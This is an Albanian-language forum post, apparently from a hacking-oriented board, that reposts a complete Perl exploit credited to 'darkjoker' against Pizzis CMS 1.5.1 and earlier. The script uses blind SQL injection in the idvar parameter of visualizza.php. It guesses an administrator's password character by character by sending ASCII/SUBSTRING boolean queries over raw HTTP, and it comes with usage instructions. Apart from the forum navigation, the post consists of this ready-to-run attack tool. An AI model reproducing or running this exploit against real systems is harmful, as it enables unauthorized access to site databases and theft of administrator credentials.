Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi.


ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
pRiaam
Administrator
Administrator


Postimet : 872
Vendodhja : n'Kamenic'ë
Puna / Hobi : HackinG & Designer

MesazhTitulli: Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit   Wed Feb 04, 2009 12:38 pm

#!/usr/bin/perl

use strict;
use warnings;
use IO:ocket;

sub usage {
die
"\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
"\n[+] Author: darkjoker".
"\n[+] Site : http://darkjoker.net23.net".
"\n[+] Usage : perl $0 <hostname> <path> <username>".
"\n[+] Ex. : perl $0 localhost /pizziscms admin".
"\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
"\n\n";
}

sub query {
my ($user, $chr, $pos) = @_;
my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user = '${user}'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}

sub exploit {
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);

my $sock = new IO:ocket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp",
) or die $!;

my $query = query ($user, $chr, $pos);
my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
"Host: ${hostname}\r\n".
"Connection: Close\r\n\r\n";

print $sock $request;

my $reply;
while (<$sock>)
{
$reply .= $_;

}
close ($sock);

$reply =~ s/\s/ /g;

$reply =~ /<h4>(.+)\/h4>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}
}

if (scalar (@ARGV) != 3)
{
usage ();
}

my ($hostname, $path, $user) = @ARGV;

my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

print "[+] Password: ";
while ($pos <= 32)
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

print "\n";

_________________

Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://Deshira-Juaj.WS
 
Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Shfrytëzuesit / Birucat-
Kërce tek: